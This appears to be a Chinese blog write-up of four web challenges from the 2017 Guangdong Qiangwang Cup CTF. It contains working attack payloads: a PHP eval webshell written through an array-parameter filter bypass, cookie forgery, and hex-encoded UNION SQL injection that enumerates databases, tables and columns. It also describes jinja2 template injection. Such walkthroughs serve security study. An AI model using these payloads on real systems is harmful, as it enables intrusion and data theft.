2017第二届广东省强网杯线上赛题 web WriteUp

最新推荐文章于 2023-03-12 15:31:37 发布
最新推荐文章于 2023-03-12 15:31:37 发布
阅读量2k 收藏 5
点赞数 2
分类专栏: # ——【 FileUpload/FileInclude】 # ——【 SQL Inject】 ★ CTF 文章标签: JSfuck ROT13加密 数组形式文件读写 十六进制sql注入 jinja2模板注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/89874060
版权

broken(JSfuck)

who are you?(数组形式实现文件读写)

phone number(转十六进制的SQL注入)

Musee de X(jinja2模板注入)

broken(JSfuck)

题目地址:http://106.75.72.168:1111/

看到这种字符,一般复制到浏览器控制台运行即可。

末尾加“]”提示语法错误,于是删除最后的“()”,在加上“]”,运行结果为“Array [ Array[1] ]”。

点击“Array[1]”即可看到flag。

who are you?(数组形式实现文件读写)

题目地址:http://106.75.72.168:2222/

查询页面没有什么特别的,于是查看一下Cookie: role=Zjo1OiJ0aHJmZyI7,Base64解密得到 f:5:"thrfg";

thrfg也是ROT13加密过的,ROT13是凯撒加密的一种变体,我们解密后得到guest。

 

尝试将admin进行凯撒加密,然后Base64加密,得到Zyl7Zjo1OiJucXp2YSI7。

 

将cookie值修改为这个,得到:

页面源代码:

如果直接输入filename=1.php&data=<?=eval($_POST['pass']);?>页面会报错"No No No!"。

Tips:写入文件除了fopen fwrite fclose 还有一种 file_put_contents ,这个允许数据是数组(可绕过一些文件内容特征检测)

因此我们可以用data[]=的方法,把data从字符串变成数组,可以绕过可能存在的正则匹配的过滤。

Payload:

http://106.75.72.168:2222/
[POST]filename=123.php&data[]=<?=eval($_POST['pass']);>

得到flag。

phone number(转十六进制的SQL注入)

题目地址:http://106.75.72.168:3333

这是一个登录注册的页面。。。

尝试注册一下用户,登陆后,查看源码,http请求,路径。。。无果

 

最后在检查手机号使用人数的 check.php 页面源码找到一个注释:

猜测大概是SQL注入。

从电话藏着秘密这句话猜测,注入点大概是phone。

 

只有注册页面有phone传参,从注册页面抓包,尝试注入。。。

登录后的页面 check的页面 可以看到返显。。。

phone处只能输入数字,所以可以将sql语句用小葵转化为16进制再注入。。

测试字段数:

1 order by 1
1 order by 2 报错

当 order by 2 时报错,说明只有1个字段。

SQL语句:

-1 union select database()
-1 union select group_concat(schema_name) from information_schema.schemata
-1 union select group_concat(table_name)  from information_schema.tables where table_schema='webdb'
-1 union select group_concat(column_name) from information_schema.columns where table_name='user'
-1 union select phone from user where username='admin'

转十六进制:

0x2D3120756E696F6E2073656C6563742064617461626173652829
0x2D3120756E696F6E2073656C6563742067726F75705F636F6E63617428736368656D615F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E736368656D617461
0x2D3120756E696F6E2073656C6563742067726F75705F636F6E636174287461626C655F6E616D6529202066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C657320776
0x2D3120756E696F6E2073656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D277573657227
0x2D3120756E696F6E2073656C6563742070686F6E652066726F6D207573657220776865726520757365726E616D653D2761646D696E27

最后爆出flag:

 

总结:

1、注入点只能是数字格式时,我们可以把sql语句转换成16进制再注入

2、跟数据库有联系的地方都可能存在注入,比如注册页面

Musee de X(jinja2模板注入)

题目地址:http://106.75.72.168:8888/

首先按照正常流程走一遍:注册、登陆、捐献,然后捐献的时候网址是随意填的,报错,分析报错信息得出这是个jinja2模板,并且用户名被带入 Template(text).render() 中进行渲染,因此基本能确定这是个jinja2模板注入。

然后攻击思路基本能确定了,注册用户名,然后将用户名带入donate操作,触发jinja2模板注入。

注意要求 注册的用户名 捐献时的用户名 是一样的。

 

大致流程:

注册:

注册成功后的返显:

访问这个路径:

 

转到捐献页面donate.php:

准备一个黑色图片,方便看到flag,填入捐献地址:

http://pic4.bbzhi.com/jingxuanbizhi/heisediannaozhuomianbizhixiazai/heisediannaozhuomianbizhixiazai_362061_5.jpg

再填上你的用户名,提交:

得到flag。

 

关于SSTI模板注入的三篇文章:

讲了模板的语法和模板注入比较基础的东西,相对容易理解:

https://blog.csdn.net/u011377996/article/details/86776181

由一道CTF题展开讲解:

https://blog.csdn.net/qq_40827990/article/details/82940894

模板注入思路总结:

https://www.freebuf.com/vuls/162752.html?replytocom=242609#respond

烟敛寒林o
关注
专栏目录
2017第二届广东省强网杯线上赛--SimpleMath(DFS)
weixin_44110537的博客
07-30 773
encrypt from Crypto.Util.number import * from hashlib import md5 flag = "xxx" assert len(flag) == 15 pad = bytes_to_long(md5(flag).digest()) hack = 0 for char in flag: hack *= ord(char) hack += pad print hack # hack = 2800984817914538371771371977305
2017第二届广东省强网杯线上web:broken write up(JSFUCK解密)
Zeker62的博客
09-29 360
目录解题思路解密方法在线工具(略)控制台解题思路 拿到题目,清一色的是[] !()+组成的字符串 这个是JSFUCK编码 解密方法 在线工具(略) 控制台 控制台可以解密JSFUCK 比如火狐:打开控制台 输入JSFUCK代码 [[(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]...
CTF-RSA-WP-2017第二届广东省强网杯线上
网安小白
03-25 457
CTF-RSA-简单题
2017第二届广东省强网杯线上赛 broken
feng的博客
09-10 440
WP 进入环境后提示我们: Hi, a CTFer. You got a file, but it looks like being broken. 我们点击file进去看看,发现居然是jsfuck。因为提示看起来损坏了,所以大概率放到工作台上运行不了。我们运行了一下,果然报错: 这时候我们点击VM52:3来看一看: 我们注意那个红色叉号的位置。我们发现第一个[可能没有对应的]。因此我们加上,再运行一下: 发现弹出了flag is not here。这时候我们可能想到会有302跳转,但是经过抓包后发现
2017第二届广东省强网杯线上赛 —— who are you?
SPS98
11-06 574
打开题目, 给出了一句:Sorry. You have no permissions. 查看网页源码, 也没有更多信息, 再看HTTP头, 发现有Cookie 直觉告诉我, 这是Base64编码 解码后, 可以看到一串像反序列化的文本, 但是不知道thrfg是什么, 盲猜是一个很随意的用户名, 先把他替换成admin看看 然而, 并没有什么卵用, 依旧是一句权限不足, 虽然也有可能区分大小...
i春秋2017第二届广东省强网杯线上赛Nonstandard题目writeup
iqiqiya的博客
08-20 1463
0x01:运行之后就提示让输入flag   如果输入不正确 就退出   0x02:PEiD查壳发现没有加壳  VC的程序     0x03:IDA载入分析  关键字符串  双击进入       双击进入   F5大法  找到关键代码   既然关键在于sub_401480这个函数   那就双击进入一探究竟   现在就明白了  我们的input经过sub_...
2017第二届广东省强网杯线上赛——WEB-who are you?
Ifish的博客
04-03 2294
打开网址查看网页源代码将网址在御剑里扫扫的同时,burpsuite抓包,一般情况下,考虑到出题说我是谁,所以一般想到用户身份,会在cookie/session这边动手脚所以base64一下得到f:5:"thrfg";挨个试了一下解密,发现是rot13(也有看别人的writeup)因为权限不够,所以尝试adminbase64加密之前又在御剑中扫到uploads目录,但是是403所以应该是POST上传...
2017第二届广东省强网杯线上WEB:Musee de X writeup(模板注入漏洞)
Zeker62的博客
09-29 218
目录解题思路总结解题思路 拿到手上,有四个页面 首先按照题目要求执行,尝试注册一个名为admin的账户 这种情况,路径都给出来了,很可能就是目录遍历或者文件上传了 回到初始界面,点击链接here 有一个捐赠界面,让我们输入捐赠的地址和名字 下面的collection de musee代表它是一个收藏馆,也不知道捐什么,就随意捐一个,比如baidu.com 可以看到是有报错的,为了让报错全部显示,...
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
在2018年的第二届强网杯线上赛中,存在一系列难度较大的Web题目,这些题目主要测试参赛者的Web安全技能,包括但不限于密码学、SQL注入、XSS攻击、CSRF漏洞等。 首先,第一层绕过机制涉及到字符串比较和MD5哈希。...
第三届强网杯线上赛记录
T19er的博客
07-02 1368
** Misc 0x01 签到** flag{welcome_to_qwb_2019} 0x02 强网先锋-打野 解压出来是一个bmp文件 打开图片 又是cxk。。。 首先想到的是丢尽Stegsolve分析一波,感觉是lsb隐写,但看不出有什么端倪。 但能够确定的是隐写题目,于是百度一波,发现zsteg是一个可以检测png和bmp文件中隐藏数据的工具,于是安装zsteg分析一波。竟然发现了...
2017第二届广东省强网杯线上赛 Nonstandard
you_need_me的博客
04-21 1295
先拉入ida分析一下我们只要让sub_401480返回值为1就可以了他把我们输入的flag进行操作与byte_402120比较byte_402120的值,这里要把前面的6eh加上也就是‘n’,得到nAdtxA66nbbdxA71tUAE2AOlnnbtrAp1nQzGtAQGtrjC7===接着我们再看一下函数sub_401070发现有点长。。。 我截取了一部分发现红框里的代码每次以5个bit为一...
2017第二届广东省强网杯线上赛:WEB phone number (SQL注入)
Zeker62的博客
09-28 245
目录解题思路总结解题思路 拿到题目的时候,只有一个登录界面 拿到登录界面,而且还伴随着有注册界面,联想到SQL的二次注入漏洞 尝试注册admin'#,并使用admin登录,发现登录失败,说明可能不存在SQL二次注入 注册之后,登录进去,在check.php页面查看源代码的时候发现有一个关于admin的注释:可能是编码不一致的问题,打开Notepad++,先选择使用ANSI编码,粘贴之后,再使...
CTF-2017第二届广东省强网杯线上赛:phone number
路漫漫其修远
07-25 225
分值:200分 类型:Web题目名称:phone number 题目内容:Phone number is a good thing. 知识点 information_schema information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。有些时候用于表述该信息的其他术...
CTF-2017第二届广东省强网杯线上赛:who are you?
路漫漫其修远
07-24 347
题目: 分值:100分 类型:Web题目名称:who are you? 题目内容: 我是谁,我在哪,我要做什么? 解题过程: 开启burpsuite,打开页面,显示"Sorry. You have no permissions." 查询报文,没有发现跳转之类,只有Cookie: role=Zjo1OiJ0aHJmZyI7有点价值 Base64解密Zjo1OiJ0aHJmZyI7,得到内容...
CTF-2017第二届广东省强网杯线上赛:broken
路漫漫其修远
07-26 184
分值:50分 类型:Web题目名称:broken 题目内容:http://106.75.72.168:1111/ you got a file, but ... 解题过程 点击url,页面显示" Hi, a CTFer. You got a file, but it looks like being broken." 点击"file"链接,页面显示jsfuck码 查看各步骤报文,无异常...
2017第二届广东省强网杯线上赛 who are you?
feng的博客
09-09 340
这是涉及编码、抓包和文件上传和preg_match的漏洞的一个题目。
2017第二届广东省强网杯线上赛--------phone number
大方子
08-27 1125
================================ 个人收获: 1.sql语句里面也可以直接用database() 2.跟数据库有联系的地方都可能存在注入   ================================ 题目:   开始前对源码,http请求,路径。。这些都找过没什么有用的信息。 就只有这个还有点用,再检查手机号使用人数页面的源码有这段注释...
强网杯2022 pwn 赛题解析——UserManager
最新发布
CoLin的pwn小屋
03-12 877
强网杯 musl libc pwn——UserManager解析
2017第二届广东省强网杯线上赛——WEB-phone number
Ifish的博客
04-04 2673
打开链接,进入登录界面http://106.75.72.168:3333/login.php看源码抓包查看源码发现最大长度为11,没有设置电话的前几位数字注册一个新用户burp suite抓包点击check源码联想到题目想到应该是在电话这里作为突破口应该是注入,因为必须是数字,所以最先想到二进制,但是发现行不通所以尝试16进制,发现可以成功,所以登录,按照注册的名字登录,发现电话号码是修改的sql...
第二届强网杯网络安全挑战赛Writeup
"这篇资源是关于第二届强网杯全国网络安全挑战赛的Writeup,涵盖了多个关卡的解题策略和技巧。" 在本次网络安全挑战赛中,参赛者需要解决一系列网络安全问题,这些问题涉及到图像隐写术、密码学、程序逆向工程以及...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值